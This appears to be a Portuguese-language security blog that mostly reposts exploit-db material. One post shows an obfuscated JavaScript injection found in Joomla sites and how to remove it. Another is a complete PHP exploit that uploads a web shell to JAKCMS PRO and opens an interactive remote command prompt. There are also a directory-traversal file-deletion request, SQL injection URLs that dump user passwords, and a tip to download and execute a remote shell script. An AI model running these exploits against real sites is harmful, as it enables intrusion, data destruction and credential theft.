dnnViewState SPAM Joomla Como resolver (HOW TO SOLVE THIS)

Standard

É comum ver o CMS joomla em suas versões mais antigas sendo trollado por uma chuva de webbots, um dos defaces mais imundos que rodam na atualidade são justamente esses 2 (AVAST Chama-o de CLICKJACK-A — TROJAN):

 

<script type=”text/javascript” language=”JavaScript”>// <![CDATA[

function xViewState()

{

var a=0,m,v,t,z,x=new Array(‘9091968376′,’8887918192818786347374918784939277359287883421333333338896′,’877886888787′,’949990793917947998942577939317’),l=x.length;while(++a<=l){m=x[l-a];

t=z=”;

for(v=0;v<m.length;){t+=m.charAt(v++);

if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

t=”;}}x[l-a]=z;}document.write(‘<‘+x[0]+’ ‘+x[4]+’>.’+x[2]+'{‘+x[1]+’}</’+x[0]+’>’);}xViewState();

// ]]></script>

Que normalmente respondem como xVIEWSTATE ou DNNVIEWSTATE, a saída para xViewState e dnnViewState está em localizar os termos em arquivos do joomla, mas 1 em comum costuma ser atacado, o arquivo modules/mod_AutsonSlideShow/tmpl/default.php, limpe a função acima (javascript) e o problema estará sanado!
Reza a lenda que wordpress sofre disso.
Para varrer seu código use o Dreamweaver ou qualquer IDE (até mesmo o terminal) que faça varredura em todos arquivos por um termo em especial (procure por dnnView ou xView) e finish!

Abraços!

JAKCMS PRO

Standard


# Exploit Title: JAKCMS PRO < = 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 n";

print "nExample....: php $argv[0] localhost /";

print "nExample....: php $argv[0] localhost /jakcms/n";

die();

}

$host = $argv[1];

$path = $argv[2];

$packet = "GET {$path} HTTP/1.0rn";

$packet .= "Host: {$host}rn";

$packet .= "Connection: closernrn";

preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m);

$sid = $m[1];

$payload = "--o0oOo0orn";

$payload .= "Content-Disposition: form-data; name="edit1"rnrn.phprn";

$payload .= "--o0oOo0orn";

$payload .= "Content-Disposition: form-data; name="input1"; filename="foo"rnrn";

$payload .= "< ?php ${error_reporting(0)}.${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))} ?>rn";

$payload .= "--o0oOo0o--rn";

$get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh"));

$packet = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0rn";

$packet .= "Host: {$host}rn";

$packet .= "Cookie: PHPSESSID={$sid}rn";

$packet .= "Content-Length: ".strlen($payload)."rn";

$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0orn";

$packet .= "Connection: closernrn";

$packet .= $payload;

if (preg_match("/Error/", http_send($host, $packet))) die("n[-] Upload failed!n");

$packet = "GET {$path}cache/sh.php HTTP/1.0rn";

$packet .= "Host: {$host}rn";

$packet .= "Cmd: %srn";

$packet .= "Connection: closernrn";

while(1)

{

print "njakcms-shell# ";

if (($cmd = trim(fgets(STDIN))) == "exit") break;

preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("n[-] Exploit failed!n");

}

?>

Fonte: http://www.exploit-db.com/exploits/17882/

Como verificar versões de CMS de maneira rápida e prática

Standard

Para verificar devemos baixar a seguinte ferramenta em um dos dois endereços abaixo:

root@appunix:˜#wget http://server.cmsversion.com/checktest.sh

ou

root@appunix:˜#wget http://www.libphp.net/checktest.sh

Em seguida fazer o seguinte

root@appunix:˜#chmod +x checktest.sh

root@appunix:˜#./checktest.sh -u logindeumacontanomeuserver

A saída deverá assemelhar-se com:

Latest Joomla: 1.5.23
Installed Version: 1.5.20
Installed Location: /home/logindeumacontanomeuserver/public_html/pathdocms/

Essa dica funciona para Joomla, WordPress, WHMCS e etc.

Tugux CMS 1.2 (pid) Arbitrary File Deletion Vulnerability

Standard


Tugux CMS 1.2 (pid) Remote Arbitrary File Deletion Vulnerability

Vendor: Tugux Studios
Product web page: http://www.tugux.com
Affected version: 1.2

Summary: Tugux CMS is a free, open-source content Management system
(CMS) and application that powers the entire web.

Desc: Input passed to the 'pid' parameter in administrator/delete_page_parse.php
is not properly sanitised before being used to delete files. This can be exploited
to delete files with the permissions of the web server via directory traversal
sequences passed within the 'pid' parameter.

------------------------------------------------------------------------------
/administrator/delete_page_parse.php:
------------------------------------------------------------------------------

1:

15:
16: Operation completed.Your page has been DELETED.
17: Click Here to go back

';
18: exit();
19: ?>

------------------------------------------------------------------------------

Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab

Advisory ID: ZSL-2011-5024
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5024.php

02.04.2011

--

POST /tugux/administrator/delete_page_parse.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 175
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="pid"

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../boot.ini
------x--

Fonte:

phpDealerLocator Multiple SQL Injection Vulnerabilities

Standard

# Exploit Title: phpDealerLocator - Multiple SQL Injection vulnerabilities
# Date: 7/3/2011
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Software Link: phpdealerlocator.yourphppro.com
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters:

record.php?Dealer_ID=
record_country.php?Dealer_ID=
results_latlong.php?s_Latitude=
results_latlong.php?s_Longitude=
results_latlong.php?s_Dealer_Radius=
results_phone.php?s_Dealer_Radius=
results_radius.php?s_Dealer_Radius=

##############################################################
PoC:

http://www.example.com/Locator/record.php?Dealer_ID=00000026 union all select 1,2,3,4,5,group_concat(Users_Name,0x3a,Users_Password,0x0a),7,8 FROM users--

##############################################################
www.websiteauditing.org
www.areyousecure.net

# Shouts to the Belegit crew

Fonte: http://www.exploit-db.com/exploits/17477/

PhpFood CMS v2.00 SQL Injection Vulnerability

Standard

#############################################################################################################
## PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability ##
## Author : kaMtiEz (kamtiez@exploit-id.com) ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ##
## Date : 3 July, 2011 ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.phpfood.com/
[+] Download : http://www.phpfood.com/download.html
[+] version : 2.00 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num] and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

[ See It ]

Duplicate entry '5.0.91-community1' for key 1 :D

[ FIX ]

dunno :">

#############################################################################################################

[ Thx TO ]

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D

[ NOTE ]

[+] Stop Dreaming , Lets Do it !
[+] Jangan Takut , Luka Pasti Akan Sembuh :)

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..

Fonte: http://www.exploit-db.com/exploits/17485/